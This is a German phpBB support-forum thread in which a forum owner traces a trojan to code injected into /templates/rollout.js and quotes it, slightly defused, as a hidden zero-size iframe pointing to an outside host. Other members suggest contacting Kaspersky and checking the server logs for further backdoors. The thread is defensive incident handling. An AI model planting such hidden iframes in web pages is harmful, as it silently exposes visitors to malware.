Hallo,
ich habe mich mal nach Onlinescannern umgeschaut, jedoch nur welche gefunden, die den heimischen Rechner scannen.
1. Kennt jemand einen Scanner, der Internetseiten scannen kann?
2. Kann sich ein Trojaner eigentlich nur in einer stinknormalen phpBB-Datei verstecken oder kann so ein Skript auch auf andere Weise ausgeführt werden?
Freundliche Grüße,
ballong
Trojaner im Forum
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
-
redbull254
- Ehemaliges Teammitglied
- Beiträge: 10379
- Registriert: 05.01.2006 13:01
- Kontaktdaten:
-
redbull254
- Ehemaliges Teammitglied
- Beiträge: 10379
- Registriert: 05.01.2006 13:01
- Kontaktdaten:
Ich habe die 'normalen', für mich sichtbaren Links schon angeklickt. Interne Verlinkungen musst Du überprüfen. Es ist ja nicht so ein 'böser' Virus oder Wurm, der sich weiter verbreitet in Deinem System, sondern ein Trojaner, der, nachdem er erst mal geladen ist ,andere Software weiter uploadet..
Wende Dich mal an Kaspersky mit einer Anfrage, vielleicht haben die einen Rat für Dich.
Wende Dich mal an Kaspersky mit einer Anfrage, vielleicht haben die einen Rat für Dich.
Beste Grüße
Walter
Walter
Mit Hilfe eines Freundes habe ich das Problem, denke ich, gelöst.
Das aufgerufene Trojanerscript verbirgt sich in der Datei /templates/rollout.js. Die wird im News MOD mitgeliefert. Irgendjemand hat wohl Zugriff auf den Server erlangt und folgendes an den Anfang der Datei gesetzt (habe den JavaScript-Befehl leicht geändert, damit hier kein Unglück geschieht).
Ich habe diesen Teil aus der Datei gelöscht und hoffe, dass der Spuk nun ein Ende hat.
Alles Gute!
ballong
Das aufgerufene Trojanerscript verbirgt sich in der Datei /templates/rollout.js. Die wird im News MOD mitgeliefert. Irgendjemand hat wohl Zugriff auf den Server erlangt und folgendes an den Anfang der Datei gesetzt (habe den JavaScript-Befehl leicht geändert, damit hier kein Unglück geschieht).
Also ein iframe mit der Größe 0.docxxxxx.write('<iframe src="http://x-road.co.kr/rich/out.php" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');
Ich habe diesen Teil aus der Datei gelöscht und hoffe, dass der Spuk nun ein Ende hat.
Alles Gute!
ballong
-
larsneo
- Mitglied
- Beiträge: 2622
- Registriert: 07.03.2002 15:23
- Wohnort: schwäbisch gmünd
- Kontaktdaten:
Irgendjemand hat wohl Zugriff auf den Server erlangt
solange du das erste problem noch nicht analysiert hast halte ich die zweite aussage für ein wenig gewagt. ich würde die kompletten logfiles auf 'rollout.js' hin analysieren um herauszufinden wie der angreifer das script auf der seite platziert hat und ob ggfs. weiterer backdoor-code im hintergrund installiert wurde (ala phising, spamversand etc)Ich habe diesen Teil aus der Datei gelöscht und hoffe, dass der Spuk nun ein Ende hat.
